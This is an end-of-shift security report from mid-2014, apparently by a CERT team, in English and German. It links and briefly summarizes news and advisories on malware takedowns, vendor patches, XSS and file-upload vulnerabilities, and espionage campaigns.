End-of-Shift report
Timeframe: Montag 30-06-2014 18:00 − Dienstag 01-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
Microsoft Darkens 4MM Sites in Malware Fight
Millions of Web sites were shuttered Monday morning after Microsoft executed a legal sneak attack against a malware network thought to be responsible for more than 7.4 million infections of Windows PCs worldwide.
http://krebsonsecurity.com/2014/07/microsoft-darkens-4mm-sites-in-malware-fight/
Apple Releases Security Updates for OS X, Safari, iOS devices, and Apple TV
Apple has released security updates for Mac OS X, Safari, iOS devices, and Apple TV to address multiple vulnerabilities, some of which could allow attackers to execute arbitrary code with system privileges or cause an unexpected application termination.
https://www.us-cert.gov/ncas/current-activity/2014/07/01/Apple-Releases-Security-Updates-OS-X-Safari-iOS-devices-and-Apple
[2014-06-30] Multiple vulnerabilities in IBM Algorithmics RICOS
Abusing multiple vulnerabilities within IBM Algorithmics RICOS, an attacker can take over foreign user accounts and bypass authorization mechanisms.
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140630-0_IBM_Algorithmics_RICOS_multiple_vulnerabilities_v10.txt
JBoss Seam org.jboss.seam.web.AuthenticationFilter code execution
http://xforce.iss.net/xforce/xfdb/94090
ICS Focused Malware
http://ics-cert.us-cert.gov//advisories/ICSA-14-178-01
CERT-Bund: Trojaner-Opfer ändern Passwörter, PCs bleiben infiziert
Die Auswertung von zehntausenden kompromittierten Mail-Zugangsdaten zeigt, dass ein beträchtlicher Teil der Opfer zwar sein Passwort ändert, allerdings schnell erneut zum Opfer wird - möglicherweise, weil der Rechner nicht desinfiziert wurde.
http://www.heise.de/security/meldung/CERT-Bund-Trojaner-Opfer-aendern-Passwoerter-PCs-bleiben-infiziert-2243405.html
[2014-07-01] Stored cross site scripting in EMC Documentum eRoom
Due to improper input validation, EMC Documentum eRoom suffers from multiple stored cross-site scripting vulnerabilities, which allow an attacker to steal other users sessions, to impersonate other users and to gain unauthorized access to documents hosted in eRooms.
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140701-0_EMC_Documentum_eRoom_Stored_XSS_v10.txt
Apple testet Zwei-Faktor-Authentifizierung auf iCloud.com
Künftig sollen auch auf Apples Cloud-Portal Zugangsdaten besser abgesichert werden. Gestern war die Funktion kurzzeitig freigegeben.
http://www.heise.de/security/meldung/Apple-testet-Zwei-Faktor-Authentifizierung-auf-iCloud-com-2243841.html
Verwirrung um Microsofts Sicherheits-Newsletter
Wer Windows-Rechner administriert, weiss den Security-Notifications-Newsletter von Microsoft zu schätzen. Letzte Woche kündigte das Unternehmen an, diesen einzustellen - um die Entscheidung kurz darauf zu revidieren.
http://www.heise.de/security/meldung/Verwirrung-um-Microsofts-Sicherheits-Newsletter-2243456.html
Cyberspying Campaign Comes With Sabotage Option
New research from Symantec spots US and Western European energy interests in the bulls eye, but the campaign could encompass more than just utilities.
http://www.darkreading.com/vulnerabilitiesthreats/advanced-threats/cyberspying-campaign-comes-with-sabotage-option/d/d-id/1278990
Geodo: New Cridex Version Combines Data Stealer and Email Worm
Recent efforts by our Research Lab has revealed new activity related to Cridex. As you may recall, Cridex is a data stealer also referred to as Feodo, and Bugat. The new Cridex version we are seeing now, aka Geodo, combines a self-spreading infection method - effectively turning each bot in the botnet ..
http://www.seculert.com/blog/2014/07/geodo-new-cridex-version-combines-data-stealer-and-email-worm.html
Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters)
Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required). This is a serious vulnerability, The MailPoet plugin (wysija-newsletters) ..
http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html
IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) Potential IPMI credentials Exposure
http://xforce.iss.net/xforce/xfdb/90880